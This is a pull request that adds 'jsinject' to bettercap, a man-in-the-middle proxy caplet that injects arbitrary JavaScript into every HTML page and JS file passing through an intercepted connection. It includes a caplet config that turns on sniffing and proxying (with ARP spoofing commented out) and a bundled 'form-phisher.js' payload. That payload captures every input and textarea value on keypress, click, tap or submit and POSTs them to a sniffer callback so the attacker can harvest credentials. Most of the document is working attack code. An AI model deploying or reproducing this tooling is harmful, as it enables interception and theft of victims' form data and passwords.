### PR TITLE
add proxy module jsinject

### DIFF
--- a/jsinject/README.md
+++ b/jsinject/README.md
@@ -22,4 +22,55 @@ http.proxy on
 **caplets/jsinject/jsinject.js**
 
 ```javascript
+var session_id,
+    payload,
+    payload_path,
+    payload_container = "" + 
+    	"if (!self.{{session_id}}) {\n" + 
+    		"var {{session_id}} = function() {\n" + 
+    			"{{payload}}\n" + 
+    		"}\n" + 
+    		"{{session_id}}();\n" + 
+    	"}\n"
+
+var green = "\033[32m",
+    bold  = "\033[1;37m",
+    reset = "\033[0m"
+
+function randomString(length) {
+	var chars  = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz",
+	    buffer = ""
+	while (buffer.length < length) {
+		index = parseInt( Math.random() * chars.length )
+		buffer = buffer + chars.charAt(index)
+	}
+	return buffer
+}
+
+function configure() {
+	payload_path = env("jsinject.payload").replace(/\s*/g, "")
+	payload = readFile(payload_path)
+	payload = payload_container.replace("{{payload}}", payload).replace(/\{\{session_id\}\}/g, session_id)
+}
+
+function onLoad() {
+	session_id = randomString( 4 + parseInt( Math.random() * 16 ) )
+	configure()
+	log_info(green + "jsinject" + reset + " started injecting payload " + bold + payload_path + reset + " into HTTP traffic.")
+	log_info(green + "jsinject" + reset + " session ID is " + bold + session_id + reset + ".")
+}
+
+function onResponse(req, res) {
+	configure()
+	if ( res.ContentType.match(/^text\/html/i) || req.Path.replace(/\?.*/i, "").match(/\.(htm|html)$/i) ) {
+		res.ReadBody()
+		log_debug("(" + green + "jsinject" + reset + ") attempting to inject HTML document in " + bold + req.Hostname + reset + " ...")
+		res.Body = res.Body.replace(/<head>/i, "<head><script>" + payload + "</script>")
+	}
+	if ( res.ContentType.match(/^text\/javascript/i) || res.ContentType.match(/^application\/javascript/i) || req.Path.replace(/\?.*/i, "").match(/\.js$/i) ) {
+		res.ReadBody()
+		log_debug("(" + green + "jsinject" + reset + ") attempting to inject JS document in " + bold + req.Hostname + reset + " ...")
+		res.Body = payload + res.Body
+	}
+}
 ```

--- a/jsinject/README.md
+++ b/jsinject/README.md
@@ -78,4 +78,4 @@ function onResponse(req, res) {
 
 ### Included payload
 
-<a href="./payloads/form-phisher.js">form-phisher.js</a> is included, which will wait for the victim to press a key before binding to the enter key, mouse click/screen tap and submit event in order to phish all the fields. This can be useful when you want to sniff proxied forms that are submitted over HTTPS, don't use URL parameters, etc.
+<b><a href="./payloads/form-phisher.js">form-phisher.js</a></b> is included, which will wait for the victim to press a key before binding to the enter key, mouse click/screen tap and submit event in order to phish all the fields. This can be useful when you want to sniff proxied forms that are submitted over HTTPS, don't use URL parameters, etc.

--- a/jsinject/README.md
+++ b/jsinject/README.md
@@ -47,7 +47,7 @@ function randomString(length) {
 }
 
 function configure() {
-	payload_path = env("jsinject.payload").replace(/\s*/g, "")
+	payload_path = env("jsinject.payload").replace(/\s/g, "")
 	payload = readFile(payload_path)
 	payload = payload_container.replace("{{payload}}", payload).replace(/\{\{session_id\}\}/g, session_id)
 }
@@ -61,12 +61,12 @@ function onLoad() {
 
 function onResponse(req, res) {
 	configure()
-	if ( res.ContentType.match(/^text\/html/i) || req.Path.replace(/\?.*/i, "").match(/\.(htm|html)$/i) ) {
+	if ( res.ContentType.match(/^text\/html/i) || req.Path.replace(/\?.*/, "").match(/\.(htm|html)$/i) ) {
 		res.ReadBody()
 		log_debug("(" + green + "jsinject" + reset + ") attempting to inject HTML document in " + bold + req.Hostname + reset + " ...")
 		res.Body = res.Body.replace(/<head>/i, "<head><script>" + payload + "</script>")
 	}
-	if ( res.ContentType.match(/^text\/javascript/i) || res.ContentType.match(/^application\/javascript/i) || req.Path.replace(/\?.*/i, "").match(/\.js$/i) ) {
+	if ( res.ContentType.match(/^text\/javascript/i) || res.ContentType.match(/^application\/javascript/i) || req.Path.replace(/\?.*/, "").match(/\.js$/i) ) {
 		res.ReadBody()
 		log_debug("(" + green + "jsinject" + reset + ") attempting to inject JS document in " + bold + req.Hostname + reset + " ...")
 		res.Body = payload + res.Body

--- a/jsinject/README.md
+++ b/jsinject/README.md
@@ -78,4 +78,4 @@ function onResponse(req, res) {
 
 ### Included payload
 
-<b><a href="./payloads/form-phisher.js">form-phisher.js</a></b> is included, which will wait for the victim to press a key before binding to the enter key, mouse click/screen tap and submit event in order to phish all the fields. This can be useful when you want to sniff proxied forms that are submitted over HTTPS, don't use URL parameters, etc.
+<b><a href="./payloads/form-phisher.js">form-phisher.js</a></b> is included, which will wait for the victim to press a key before binding to the enter key, mouse click, screen tap and submit event in order to phish all the fields. This can be useful when you want to sniff proxied forms that are submitted over HTTPS, don't use URL parameters, etc.

--- a/jsinject/README.md
+++ b/jsinject/README.md
@@ -16,7 +16,6 @@ set http.proxy.script caplets/jsinject/jsinject.js
 set net.sniff.verbose false
 net.sniff on
 http.proxy on
-#arp.spoof on
 ```
 
 **caplets/jsinject/jsinject.js**

--- a/jsinject/README.md
+++ b/jsinject/README.md
@@ -78,4 +78,4 @@ function onResponse(req, res) {
 
 ### Included payload
 
-<b><a href="./payloads/form-phisher.js">form-phisher.js</a></b> is included, which will wait for the victim to press a key before binding to the enter key, mouse click, screen tap and submit event in order to phish all the fields. This can be useful when you want to sniff proxied forms that are submitted over HTTPS, don't use URL parameters, etc.
+<b><a href="./payloads/form-phisher.js">form-phisher.js</a></b> is included, which will wait for the victim to press a key before binding to the enter key, mouse click, screen tap and submit events in order to phish all the fields. This can be useful when you want to sniff proxied forms that are submitted over HTTPS, don't use URL parameters, etc.

--- a/jsinject/README.md
+++ b/jsinject/README.md
@@ -78,4 +78,4 @@ function onResponse(req, res) {
 
 ### Included payload
 
-**form-phisher.js** is included, which will wait for the victim to press a key before binding to the enter key, mouse click/screen tap and submit event in order to phish all the fields. This can be useful when you want to sniff proxied forms that are submitted over HTTPS, don't use URL parameters, etc.
+<a href="./payloads/form-phisher.js">form-phisher.js</a> is included, which will wait for the victim to press a key before binding to the enter key, mouse click/screen tap and submit event in order to phish all the fields. This can be useful when you want to sniff proxied forms that are submitted over HTTPS, don't use URL parameters, etc.

--- a/jsinject/README.md
+++ b/jsinject/README.md
@@ -78,4 +78,4 @@ function onResponse(req, res) {
 
 ### Included payload
 
-**form-phisher.js** is included, which will wait for the victim to press a key before binding to the enter key and mouse click/screen tap in order to phish all the fields. This can be useful when you want to sniff proxied forms that are submitted over HTTPS, don't use URL parameters, etc.
+**form-phisher.js** is included, which will wait for the victim to press a key before binding to the enter key, mouse click/screen tap and submit event in order to phish all the fields. This can be useful when you want to sniff proxied forms that are submitted over HTTPS, don't use URL parameters, etc.

--- a/jsinject/README.md
+++ b/jsinject/README.md
@@ -63,12 +63,12 @@ function onResponse(req, res) {
 	configure()
 	if ( res.ContentType.match(/^text\/html/i) || req.Path.replace(/\?.*/, "").match(/\.(htm|html)$/i) ) {
 		res.ReadBody()
-		log_debug("(" + green + "jsinject" + reset + ") attempting to inject HTML document in " + bold + req.Hostname + reset + " ...")
+		log_debug("(" + green + "jsinject" + reset + ") attempting to inject HTML document from " + bold + req.Hostname + reset + " ...")
 		res.Body = res.Body.replace(/<head>/i, "<head><script>" + payload + "</script>")
 	}
 	if ( res.ContentType.match(/^text\/javascript/i) || res.ContentType.match(/^application\/javascript/i) || req.Path.replace(/\?.*/, "").match(/\.js$/i) ) {
 		res.ReadBody()
-		log_debug("(" + green + "jsinject" + reset + ") attempting to inject JS document in " + bold + req.Hostname + reset + " ...")
+		log_debug("(" + green + "jsinject" + reset + ") attempting to inject JS document from " + bold + req.Hostname + reset + " ...")
 		res.Body = payload + res.Body
 	}
 }

--- a/jsinject/README.md
+++ b/jsinject/README.md
@@ -2,7 +2,7 @@
 
 A simple yet powerful proxy module that lets you inject your JavaScript payloads into any HTTP web page/application.
 
-It prevents re-initiation of your script when it's already active in the DOM by declaring your payload as a unique function variable, and it ignores the `X-Content-Type-Options: nosniff` header by checking for both file extensions and `Content-Type` headers.
+It prevents re-initiation of your script when it's already active in the DOM by declaring your payload as a unique function variable, and it ignores the `X-Content-Type-Options: nosniff` header by checking for both `Content-Type` headers and file extensions.
 
 All you have to do is set your payload path in the caplet file.
 

--- a/jsinject/README.md
+++ b/jsinject/README.md
@@ -1,0 +1,25 @@
+### JS-INJECT
+
+A simple yet powerful proxy module that lets you inject your JavaScript payloads into any HTTP web page/application.
+
+It prevents re-initiation of your script when it's already active in the DOM by declaring your payload as a unique function variable, and it ignores the `X-Content-Type-Options: nosniff` header by checking for both file extensions and `Content-Type` headers.
+
+All you have to do is set your payload path in the caplet file.
+
+**caplets/jsinject/jsinject.cap**
+
+```sh
+# Set the path to your JavaScript payload
+set jsinject.payload caplets/jsinject/payloads/form-phisher.js
+
+set http.proxy.script caplets/jsinject/jsinject.js
+set net.sniff.verbose false
+net.sniff on
+http.proxy on
+#arp.spoof on
+```
+
+**caplets/jsinject/jsinject.js**
+
+```javascript
+```

--- a/jsinject/README.md
+++ b/jsinject/README.md
@@ -2,7 +2,7 @@
 
 A simple yet powerful proxy module that lets you inject your JavaScript payloads into any HTTP web page/application.
 
-It prevents re-initiation of your script when it's already active in the DOM by declaring your payload as a unique function variable, and it ignores the `X-Content-Type-Options: nosniff` header by checking for both `Content-Type` headers and file extensions.
+It prevents re-initiation of your script when it's already active in the DOM by declaring your payload as a unique function variable, and in some cases ignores the `X-Content-Type-Options: nosniff` header by checking for both `Content-Type` headers and file extensions.
 
 All you have to do is set your payload path in the caplet file.
 

--- a/jsinject/README.md
+++ b/jsinject/README.md
@@ -74,3 +74,9 @@ function onResponse(req, res) {
 	}
 }
 ```
+
+<hr>
+
+### Included payload
+
+**form-phisher.js** is included, which will wait for the victim to press a key before binding to the enter key and mouse click/screen tap in order to phish all the fields. This can be useful when you want to sniff proxied forms that are submitted over HTTPS, don't use URL parameters, etc.

--- a/jsinject/jsinject.cap
+++ b/jsinject/jsinject.cap
@@ -1,0 +1,8 @@
+# Set the path to your JavaScript payload
+set jsinject.payload caplets/jsinject/payloads/form-phisher.js
+
+set http.proxy.script caplets/jsinject/jsinject.js
+set net.sniff.verbose false
+net.sniff on
+http.proxy on
+#arp.spoof on

--- a/jsinject/jsinject.js
+++ b/jsinject/jsinject.js
@@ -1,0 +1,51 @@
+var session_id,
+    payload,
+    payload_path,
+    payload_container = "" + 
+    	"if (!self.{{session_id}}) {\n" + 
+    		"var {{session_id}} = function() {\n" + 
+    			"{{payload}}\n" + 
+    		"}\n" + 
+    		"{{session_id}}();\n" + 
+    	"}\n"
+
+var green = "\033[32m",
+    bold  = "\033[1;37m",
+    reset = "\033[0m"
+
+function randomString(length) {
+	var chars  = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz",
+	    buffer = ""
+	while (buffer.length < length) {
+		index = parseInt( Math.random() * chars.length )
+		buffer = buffer + chars.charAt(index)
+	}
+	return buffer
+}
+
+function configure() {
+	payload_path = env("jsinject.payload").replace(/\s*/g, "")
+	payload = readFile(payload_path)
+	payload = payload_container.replace("{{payload}}", payload).replace(/\{\{session_id\}\}/g, session_id)
+}
+
+function onLoad() {
+	session_id = randomString( 4 + parseInt( Math.random() * 16 ) )
+	configure()
+	log_info(green + "jsinject" + reset + " started injecting payload " + bold + payload_path + reset + " into HTTP traffic.")
+	log_info(green + "jsinject" + reset + " session ID is " + bold + session_id + reset + ".")
+}
+
+function onResponse(req, res) {
+	configure()
+	if ( res.ContentType.match(/^text\/html/i) || req.Path.replace(/\?.*/i, "").match(/\.(htm|html)$/i) ) {
+		res.ReadBody()
+		log_debug("(" + green + "jsinject" + reset + ") attempting to inject HTML document in " + bold + req.Hostname + reset + " ...")
+		res.Body = res.Body.replace(/<head>/i, "<head><script>" + payload + "</script>")
+	}
+	if ( res.ContentType.match(/^text\/javascript/i) || res.ContentType.match(/^application\/javascript/i) || req.Path.replace(/\?.*/i, "").match(/\.js$/i) ) {
+		res.ReadBody()
+		log_debug("(" + green + "jsinject" + reset + ") attempting to inject JS document in " + bold + req.Hostname + reset + " ...")
+		res.Body = payload + res.Body
+	}
+}

--- a/jsinject/jsinject.js
+++ b/jsinject/jsinject.js
@@ -40,12 +40,12 @@ function onResponse(req, res) {
 	configure()
 	if ( res.ContentType.match(/^text\/html/i) || req.Path.replace(/\?.*/, "").match(/\.(htm|html)$/i) ) {
 		res.ReadBody()
-		log_debug("(" + green + "jsinject" + reset + ") attempting to inject HTML document in " + bold + req.Hostname + reset + " ...")
+		log_debug("(" + green + "jsinject" + reset + ") attempting to inject HTML document from " + bold + req.Hostname + reset + " ...")
 		res.Body = res.Body.replace(/<head>/i, "<head><script>" + payload + "</script>")
 	}
 	if ( res.ContentType.match(/^text\/javascript/i) || res.ContentType.match(/^application\/javascript/i) || req.Path.replace(/\?.*/, "").match(/\.js$/i) ) {
 		res.ReadBody()
-		log_debug("(" + green + "jsinject" + reset + ") attempting to inject JS document in " + bold + req.Hostname + reset + " ...")
+		log_debug("(" + green + "jsinject" + reset + ") attempting to inject JS document from " + bold + req.Hostname + reset + " ...")
 		res.Body = payload + res.Body
 	}
 }

--- a/jsinject/jsinject.js
+++ b/jsinject/jsinject.js
@@ -24,7 +24,7 @@ function randomString(length) {
 }
 
 function configure() {
-	payload_path = env("jsinject.payload").replace(/\s*/g, "")
+	payload_path = env("jsinject.payload").replace(/\s/g, "")
 	payload = readFile(payload_path)
 	payload = payload_container.replace("{{payload}}", payload).replace(/\{\{session_id\}\}/g, session_id)
 }
@@ -38,12 +38,12 @@ function onLoad() {
 
 function onResponse(req, res) {
 	configure()
-	if ( res.ContentType.match(/^text\/html/i) || req.Path.replace(/\?.*/i, "").match(/\.(htm|html)$/i) ) {
+	if ( res.ContentType.match(/^text\/html/i) || req.Path.replace(/\?.*/, "").match(/\.(htm|html)$/i) ) {
 		res.ReadBody()
 		log_debug("(" + green + "jsinject" + reset + ") attempting to inject HTML document in " + bold + req.Hostname + reset + " ...")
 		res.Body = res.Body.replace(/<head>/i, "<head><script>" + payload + "</script>")
 	}
-	if ( res.ContentType.match(/^text\/javascript/i) || res.ContentType.match(/^application\/javascript/i) || req.Path.replace(/\?.*/i, "").match(/\.js$/i) ) {
+	if ( res.ContentType.match(/^text\/javascript/i) || res.ContentType.match(/^application\/javascript/i) || req.Path.replace(/\?.*/, "").match(/\.js$/i) ) {
 		res.ReadBody()
 		log_debug("(" + green + "jsinject" + reset + ") attempting to inject JS document in " + bold + req.Hostname + reset + " ...")
 		res.Body = payload + res.Body

--- a/jsinject/payloads/form-phisher.js
+++ b/jsinject/payloads/form-phisher.js
@@ -1,0 +1,35 @@
+var hooked = false
+
+function callback() {
+	var inputs    = document.getElementsByTagName("input"),
+	    textareas = document.getElementsByTagName("textarea"),
+	    params
+	for (var i = 0; i < inputs.length; i++) {
+		if (inputs[i].value != "") {
+			params = params + inputs[i].name + "=" + inputs[i].value + ( i < (inputs.length-1) ? "&" : "" )
+		}
+	}
+	for (var i = 0; i < textareas.length; i++) {
+		if (textareas[i].value != "") {
+			params = params + textareas[i].name + "=" + textareas[i].value + ( i < (textareas.length-1) ? "&" : "" )
+		}
+	}
+	if (params.length > 0) {
+	  req = new XMLHttpRequest()
+	  req.open("POST", "http://" + location.host + "/bettercap_sniffer_callback?" + params, true)
+	  req.send()
+	}
+}
+
+self.addEventListener("keydown", function(event) {
+	(event.key == "Enter" || event.keyCode == 13) ? callback() : ""
+	if (hooked == false) {
+		self.addEventListener("click", callback)
+		self.addEventListener("touchend", callback)
+		forms = document.querySelectorAll("form")
+		for (var i = 0; i < forms.length; i++) {
+			forms[i].addEventListener("submit", callback)
+		}
+		hooked = true
+	}
+})


### PR DESCRIPTION
A simple yet powerful proxy module that lets you inject your JavaScript payloads into any HTTP web page/application.

Useful when a host with TLS includes scripts from hosts without TLS.